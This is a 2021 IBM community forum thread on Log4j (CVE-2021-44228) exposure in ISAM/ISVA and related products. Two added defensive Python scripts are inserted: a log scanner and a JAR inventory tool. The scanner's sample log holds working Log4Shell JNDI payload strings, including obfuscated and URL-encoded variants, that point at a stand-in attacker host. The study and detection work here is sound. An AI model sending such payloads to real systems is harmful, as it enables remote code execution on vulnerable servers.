IBM Verify

Join this online user group to communicate across Security product users and IBM experts by sharing advice and best practices with peers and staying up to date regarding product enhancements.


ISAM use of log4j ?

  • 1.  ISAM use of log4j ?

    Posted Fri December 10, 2021 07:48 AM
    Hello everybody,
    Today a critical vulnerability was announced in the widely used Log4J library: RCE 0-day exploit found in log4j, a popular Java logging package | LunaSec
    As we have many Java applications/products, we are trying to assess which assets could be vulnerable.

    We are unable to find out whether ISAM/ISVA uses the log4j library.

    Does someone know if there is a place somewhere where this kind of dependency is listed with its version?


    Thank you,
    André

    ------------------------------
    André Leruitte
    ------------------------------


  • 2.  RE: ISAM use of log4j ?

    Posted Sun December 12, 2021 12:25 PM
    Hi André,

    The ISAM v8/9 and ISVA v10 appliances are not affected by CVE-2021-44228.
    At this time there is not an update to the X-Force signatures used by the embedded Web Application Firewall.
    Junctioned applications should be updated per their vendors' instructions.


    ------------------------------
    Nick
    IBM Security Verify Customer Support
    ------------------------------



  • 3.  RE: ISAM use of log4j ?

    Posted Sun December 12, 2021 05:53 PM
    Hi Nick, 

    Is this vulnerability relevant for ISIM 6.0?


    ------------------------------
    Igor Vinogradov
    ------------------------------



  • 4.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 08:42 AM

    Hi Igor, regarding your question about this vulnerability (CVE-2021-44228) and ISIM.  There is a component of ISIM that contains Log4j but the impact is still being fully explored.  For now we ask that you continue monitoring this PSIRT blog for the latest information:
    https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/

    We expect there to be product specific Security Bulletins published soon, to include ISIM, IGI, and ISVG



    ------------------------------
    Daniel Barto
    ------------------------------



  • 5.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 06:07 PM
    FYI, Security Bulletin for ISIM, IGI, & ISVG now published:
    https://www.ibm.com/support/pages/node/6526752

    ------------------------------
    Daniel Barto
    ------------------------------



  • 6.  RE: ISAM use of log4j ?

    Posted Mon December 13, 2021 02:08 AM
    Hi Nick,

    Thanks a lot for your reply. This is very good news.

    I'm trying to find the same information about IBM DataPower and API Connect but I have been unable to find anything so far. Do you have any idea where I could look?

    Regards

    ------------------------------
    André Leruitte
    ------------------------------



  • 7.  RE: ISAM use of log4j ?

    Posted Tue December 14, 2021 09:58 AM

    IBM DataPower Gateway is not affected by CVE-2021-44228 (LOG4J) vulnerability

    https://www.ibm.com/support/pages/node/6525862



    ------------------------------
    Alan Bratteson
    ------------------------------



  • 8.  RE: ISAM use of log4j ?

    Posted Mon December 13, 2021 07:48 AM
    According to the page below, ISAM is in fact using log4j. To what effect, it does not state. Can you confirm that it is only used internally, and not for things like reverse proxy log files etc.?

    https://www.ibm.com/support/pages/urgent-apar-information-ibm-security-access-manager-9072-firmware-upgrade

    UPDATE TO MULTIPLE DEPENDENT SOFTWARE PRODUCTS

    ...
                  libpcap                     1.5.3.11
                  log4j                         2.13.2
                  nss-softokn              3.44.0.8
    ...



    ------------------------------
    Jesper James
    PFA
    004530950933
    ------------------------------



  • 9.  RE: ISAM use of log4j ?

    Posted Mon December 13, 2021 02:55 PM
    Jesper,
     
    IBM is still fully investigating the repercussions of the Log4J vulnerability and an official response should be published soon.  I can however say that the reverse proxy itself is a C++ binary and does not embed any Java code, and as such will not be vulnerable.  IBM is still investigating the impact on the Advanced Access Control and Federation offerings.
     
    Thanks.
     
     
    Scott A. Exton
    Senior Software Engineer
    Chief Programmer - IBM Security Verify Access

    IBM Master Inventor






  • 10.  RE: ISAM use of log4j ?

    Posted Mon December 13, 2021 09:37 PM
    Edited by Sylvain Gilbert Mon December 13, 2021 11:10 PM
    For general information on IBM's response to Apache Log4j CVE-2021-44228 vulnerability we can all refer here:

    https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/

    "IBM Software and Systems Products
    IBM is continuing a product-by-product analysis for Log4j impacts. If an IBM Software or Systems product is impacted, there will be a bulletin posted on this blog as a remediation or fix becomes available. Such on-premise IBM products will then have to be updated by the customer"

    However, knowing that a product is NOT vulnerable (confirmed) is equally as important as knowing that it is vulnerable, as it can help decision makers decide whether or not to pull the plug on online services.

    ------------------------------
    Sylvain Gilbert
    ------------------------------



  • 11.  RE: ISAM use of log4j ?

    Posted Tue December 14, 2021 08:43 AM
    Thank you, we can see that we have been hit with multiple exploit attempts already since the 11th of December. The bad guys move fast. You should too :D

    ------------------------------
    Jesper James
    PFA
    004530950933
    ------------------------------
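Exploit attempts like the ones Jesper describes show up in the reverse-proxy access log as `${jndi:...}` lookup strings in the URI, User-Agent or other headers, usually wrapped in `${lower:...}` / `${::-x}` tricks or URL-encoded to slip past naive signatures. The script below is an added example (not part of this thread and not IBM code) that normalizes those encodings before matching, run over a handful of constructed access-log lines. The log format and field positions are assumptions, not the WebSEAL request-log format.

```python
"""Flag Log4Shell (CVE-2021-44228) probe strings in HTTP access-log lines.

Added example, not from the thread or from IBM. The log lines below are
constructed to resemble a reverse-proxy access log; the format and the
field positions are assumptions, not the WebSEAL request-log format.
"""
import re
from urllib.parse import unquote

# Constructed sample: five request lines, four of them probes (not real traffic).
SAMPLE_LOG = r"""
203.0.113.5 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"
203.0.113.6 - - [11/Dec/2021:03:15:22 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2021:10:01:09 +0000] "GET /?x=${${lower:j}${lower:n}di:${lower:l}dap://203.0.113.9/x} HTTP/1.1" 404 0 "-" "curl/7.79"
203.0.113.8 - - [12/Dec/2021:10:02:44 +0000] "GET /login HTTP/1.1" 200 2048 "${jndi:${::-r}mi://203.0.113.9/o}" "-"
203.0.113.9 - - [12/Dec/2021:10:03:01 +0000] "GET /a?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fz%7D HTTP/1.1" 200 99 "-" "x"
"""

# Innermost ${lower:x} / ${upper:x} lookups and ${anything:-default} fallbacks,
# the two obfuscations seen most in the wild; neither contains nested braces,
# so repeated substitution peels them from the inside out.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)?", re.IGNORECASE)


def normalize(s: str) -> str:
    """Undo URL encoding and collapse nested lookups until nothing changes."""
    for _ in range(5):  # bounded: the input is attacker-controlled
        decoded = unquote(s)
        decoded = _CASE_LOOKUP.sub(r"\1", decoded)
        decoded = _DEFAULT_LOOKUP.sub(r"\1", decoded)
        if decoded == s:
            break
        s = decoded
    return s


def scan_log(text: str) -> list:
    """Return one finding per log line carrying a ${jndi:...} lookup."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        norm = normalize(raw)
        m = _JNDI.search(norm)
        if m:
            findings.append({
                "line": line_no,
                "src": raw.split(" ", 1)[0],       # first field: client address
                "scheme": (m.group(1) or "").lower(),  # ldap, rmi, dns, ...
                "normalized": norm,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['src']} scheme={f['scheme']}")
```

A hit here means a probe reached the proxy, not that anything behind it executed the lookup; use it to prioritise which junctioned applications to check first. Matching on the normalized form is still heuristic (Log4j supports more lookup types than the two collapsed here), so treat a clean result as absence of evidence rather than proof.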



  • 12.  RE: ISAM use of log4j ?

    Posted Tue December 14, 2021 04:52 PM
    Hi Scott, does this technote mean it is the definitive assessment for ISAM/ISVA, or could more updates come in the next hours/days?

    Security Bulletin: IBM Security Access Manager 9.0.7.1 and IBM Security Verify Access 10.0.0.0 may be affected by the log4j vulnerability (CVE-2021-44228)



    ------------------------------
    Sylvain Gilbert
    ------------------------------



  • 13.  RE: ISAM use of log4j ?

    Posted Tue December 14, 2021 05:23 PM
    Sylvain,
     
    This is the official, and definitive, statement from IBM for ISAM/ISVA.  We don't envisage any further updates as the in-depth investigation has been completed for the product.
     
    Thanks.
     
    Scott A. Exton
    Senior Software Engineer
    Chief Programmer - IBM Security Verify Access

    IBM Master Inventor






  • 14.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 01:56 AM

    Hi Scott,

    Does this mean that ISAM v9.0.7.2 is not impacted, as I see in the article that only ISAM 9.0.7.1 and ISVA 10.0.0.0 are impacted?

    Thx in advance,
        Kristof Goossens



    ------------------------------
    Kristof Goossens
    ------------------------------



  • 15.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 02:24 AM
    Kristof,
     
    The ISAM 9.0.7.1 and ISVA 10.0.0.0 releases are the only ISAM/ISVA releases which could potentially be vulnerable to CVE-2021-44228.  However, 9.0.7.2 does include a version of Log4J which is vulnerable to a different issue: https://nvd.nist.gov/vuln/detail/CVE-2021-4104.  IBM is recommending that customers who are running 9.0.7.2 apply a fix-pack to address this vulnerability: see https://www.ibm.com/support/pages/node/6526432.
     
    I hope that this helps.
     
    Thanks.
     
     
    Scott A. Exton
    Senior Software Engineer
    Chief Programmer - IBM Security Verify Access

    IBM Master Inventor





  • 16.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 03:01 AM
    Hi Scott,

    Thx for the additional info!

    Kristof

    ------------------------------
    Kristof Goossens
    ------------------------------



  • 17.  RE: ISAM use of log4j ?

    Posted Fri December 17, 2021 03:37 AM
    Hello Scott,
    We are at level ISAM v9.0.2.0; is this vulnerable to CVE-2021-44228? I specifically see that v9.0.7.0 and v10 are vulnerable. Could you please confirm?
    If yes, and if we have to upgrade to v9.0.7.2, then is it possible to perform an on-top or in-place upgrade so I do not lose all my configuration?


    ------------------------------
    Naveen Paila
    ------------------------------



  • 18.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 08:42 AM
    Hi Scott et al.

    After the release of https://www.ibm.com/support/pages/node/6526432?myns=swgother&mynp=OCSSQRZH&mync=E&cm_sp=swgother-_-OCSSQRZH-_-E it appears there are issues with 9.0.7.1 and 9.0.7.2.

    With respect to the link above though, will there be any outage (automatic appliance/instance restarts) applying this?

    The fix is there but documentation around it is lacking.

    Any update would be appreciated.

    All the best,
    Tony

    ------------------------------
    Tony Cooke
    ------------------------------



  • 19.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 10:23 AM
    What if you are running ISAM 9.0.7.5?  Does the patch need to be applied?

    ------------------------------
    Patrick Davis
    ------------------------------



  • 20.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 02:56 PM
    Patrick,
     
    I don't believe that there is a 9.0.7.5 release for ISAM.  Are you asking about ISAM or a different product?
     
    Thanks.
     
     
    Scott A. Exton
    Senior Software Engineer
    Chief Programmer - IBM Security Verify Access

    IBM Master Inventor
     

    Phone: 61-7-5552-4008
    E-mail: scotte@au1.ibm.com
    1 Corporate Court
    Bundall, QLD 4217
    Australia





  • 21.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 03:07 PM
    I think IBM briefly released fix pack 5.  Our ISAM appliances have been on it for a year.



    ------------------------------
    Patrick Davis
    ------------------------------



  • 22.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 03:13 PM
    Patrick,

    I can understand the confusion - but you are referring to 9.0.7.1 IF 5.  So, IBM is recommending that you upgrade to 9.0.7.2 (which should incorporate 9.0.7.1 IF 5), and then apply the fix-pack.

    Thanks.

    ------------------------------
    Scott Exton
    IBM
    Gold Coast
    ------------------------------



  • 23.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 03:36 PM
    Thanks Scott

    ------------------------------
    Patrick Davis
    ------------------------------



  • 24.  RE: ISAM use of log4j ?

    Posted Thu December 16, 2021 02:20 AM
    If you plan to upgrade to 9.0.7.2, consider ISVA 10+ versions as v9.x will be out of support (very) soon.

    ------------------------------
    Cedric Servais
    ------------------------------



  • 25.  RE: ISAM use of log4j ?

    Posted Thu December 16, 2021 09:15 AM
    We did upgrade from 9.0.7.2 to ISVA 10.0.2, but the LMI was very slow and we had other issues with the new version.  We ended up rolling back to 9.0.7.1 and plan to upgrade after IBM fixes the bugs in ISVA 10.

    ------------------------------
    Patrick Davis
    ------------------------------



  • 26.  RE: ISAM use of log4j ?

    Posted Thu December 16, 2021 09:10 AM
    Scott,

    Thanks for the responses.  I am trying to download 9.0.7.2 from IBM, but I cannot find the package to download.  I looked on IBM Passport Advantage and Fix Central and it is not in either place.  I don't think I can just upgrade from 9.0.7.1 to 9.0.7.2 IF 3 without the package.

    ------------------------------
    Patrick Davis
    ------------------------------



  • 27.  RE: ISAM use of log4j ?

    Posted Thu December 16, 2021 02:47 PM
    Patrick,
     
     
    Thanks.
     
     
    Scott A. Exton
    Senior Software Engineer
    Chief Programmer - IBM Security Verify Access

    IBM Master Inventor






  • 28.  RE: ISAM use of log4j ?

    Posted Thu December 16, 2021 02:51 PM
    Got it. Thanks!

    ------------------------------
    Patrick Davis
    ------------------------------



  • 29.  RE: ISAM use of log4j ?

    Posted Thu December 16, 2021 10:21 AM
    We are on 9.0.7.1 IF5.  Is there a fix pack for it, instead of upgrading to 9.0.7.2 and then applying the fix pack?

    Thanks Harsha

    ------------------------------
    Harsha S
    ------------------------------



  • 30.  RE: ISAM use of log4j ?

    Posted Wed December 15, 2021 02:58 PM
    Tony,
     
    A restart of the LMI, and potentially the runtime profile for AAC/Federation, will be required.  This should happen automatically when the fix-pack is installed, but I will seek further clarification from the support team and hopefully get them to update the support page with this information.
     
    Thanks.
     
     
    Scott A. Exton
    Senior Software Engineer
    Chief Programmer - IBM Security Verify Access

    IBM Master Inventor
     

    Phone: 61-7-5552-4008
    E-mail: scotte@au1.ibm.com
    1 Corporate Court
    Bundall, QLD 4217
    Australia





  • 31.  RE: ISAM use of log4j ?

    Posted Thu December 16, 2021 04:39 AM
    Hello Everybody,

    Does IBM plan to publish an iFix only for the log4j vulnerability on 9.0.7.x?
    It's easier to install and avoids significant non-regression testing on all our applications.
    Thanks

    Romuald

    ------------------------------
    Romuald Blondel
    ------------------------------



  • 32.  RE: ISAM use of log4j ?

    Posted Wed December 22, 2021 11:42 AM
    Can someone tell me if log4j is used by the RTSS?  WebSEAL?  Both?

    We have appliances that run WebSEAL and process Federation/AAC requests via the RTSS.  We have appliances that do not have RTSS running and only run WebSEAL.

    If we only need to apply fix packs to the appliances that run RTSS, that is a lot of appliances we won't have to apply fix packs to.  So I would like to have that clarification and/or recommendation.

    Thanks

    ------------------------------
    Troy Burkle
    ------------------------------



  • 33.  RE: ISAM use of log4j ?

    Posted Thu December 23, 2021 04:06 AM
    It's an appliance -> apply the fix. Now.

    In summary: if you can't examine the inside, you have no way of determining if log4j is in use.  If you can't determine that, you'll have to assume that it's in use.

    ------------------------------
    José Pina Coelho
    IT Specialist at Kyndryl
    ------------------------------
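José's point holds for a sealed appliance, where the vendor bulletin is the only inventory you get. For the Java applications junctioned behind it, which André's opening question and the dependency list Jesper quoted (log4j 2.13.2) are really about, you can answer the question yourself by reading the Maven metadata inside each deployed archive. The script below is an added example, not code from this thread or from IBM: it walks JAR/WAR/EAR files (including jars nested inside a WAR), reads `log4j-core`'s `pom.properties`, checks whether `JndiLookup.class` is still present, and classifies the result against the published CVE-2021-44228 boundaries (2.0-beta9 through 2.14.1 affected; 2.15.0, and 2.12.2 on the Java 7 line, fixed for this CVE). The archives it scans are constructed in memory so it runs offline; the 2.13.2 version string is taken from the firmware note quoted above, the archives themselves are not IBM artifacts.

```python
"""Inventory log4j-core inside JAR/WAR/EAR archives and classify for CVE-2021-44228.

Added example, not from the thread or from IBM. Sample archives are built
in memory (constructed, not real IBM artifacts) so the script runs offline.
"""
import io
import re
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
MAX_DEPTH = 4  # nested archives: bound the recursion on untrusted input


def parse_version(v: str) -> tuple:
    """'2.13.2' -> (2, 13, 2); '2.0-beta9' -> (2, 0, 0): pre-release tags are dropped."""
    nums = [int(n) for n in re.findall(r"\d+", v.split("-")[0])][:3]
    return tuple(nums + [0] * (3 - len(nums)))


def classify(version: str, jndi_lookup_present: bool) -> str:
    """Verdict for CVE-2021-44228 only; later CVEs (45046, 45105) moved the bar to 2.17.x."""
    ver = parse_version(version)
    if ver < (2, 0, 0):
        return "log4j 1.x: not affected by CVE-2021-44228 (other CVEs apply)"
    if ver >= (2, 15, 0) or ver == (2, 12, 2):
        return "fixed"
    if not jndi_lookup_present:
        # Apache's documented mitigation for 2.10+: delete the lookup class from the jar.
        return "affected version, but JndiLookup.class removed (mitigated)"
    return "VULNERABLE"


def scan_archive(data: bytes, path: str = "", depth: int = 0) -> list:
    """Return one finding per log4j-core found in the archive or any nested archive."""
    findings = []
    if depth > MAX_DEPTH:
        return findings
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            props = dict(
                line.split("=", 1)
                for line in zf.read(POM_PROPS).decode().splitlines()
                if "=" in line and not line.startswith("#")
            )
            version = props.get("version", "unknown").strip()
            findings.append({
                "path": path or "<root>",
                "version": version,
                "status": classify(version, JNDI_LOOKUP in names),
            })
        for name in sorted(names):
            if name.lower().endswith((".jar", ".war", ".ear")):
                inner = f"{path}!{name}" if path else name
                findings.extend(scan_archive(zf.read(name), inner, depth + 1))
    return findings


def _jar(entries: dict) -> bytes:
    """Build a zip (jar) in memory from {name: str|bytes}; constructed test data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_samples() -> dict:
    """Constructed archives, one per case worth distinguishing (not real IBM artifacts)."""
    stub_class = b"\xca\xfe\xba\xbe"  # class-file magic; the body is irrelevant here
    vuln = _jar({POM_PROPS: "version=2.13.2\n", JNDI_LOOKUP: stub_class})
    stripped = _jar({POM_PROPS: "version=2.13.2\n"})            # lookup class deleted
    fixed = _jar({POM_PROPS: "version=2.17.1\n", JNDI_LOOKUP: stub_class})
    war = _jar({"WEB-INF/lib/log4j-core-2.13.2.jar": vuln, "WEB-INF/web.xml": "<web-app/>"})
    return {"vuln.jar": vuln, "stripped.jar": stripped, "fixed.jar": fixed, "app.war": war}


if __name__ == "__main__":
    for name, blob in build_samples().items():
        for f in scan_archive(blob, name):
            print(f"{f['path']}: log4j-core {f['version']} -> {f['status']}")
```

Two caveats when you point this at real deployments: a jar whose `pom.properties` was stripped by a shading or repackaging step still carries the `JndiLookup.class` entry, so a missing version with the class present should be treated as unknown rather than clean; and the archive walk says nothing about log4j jars on a shared classpath outside the application archive, which is a separate inventory.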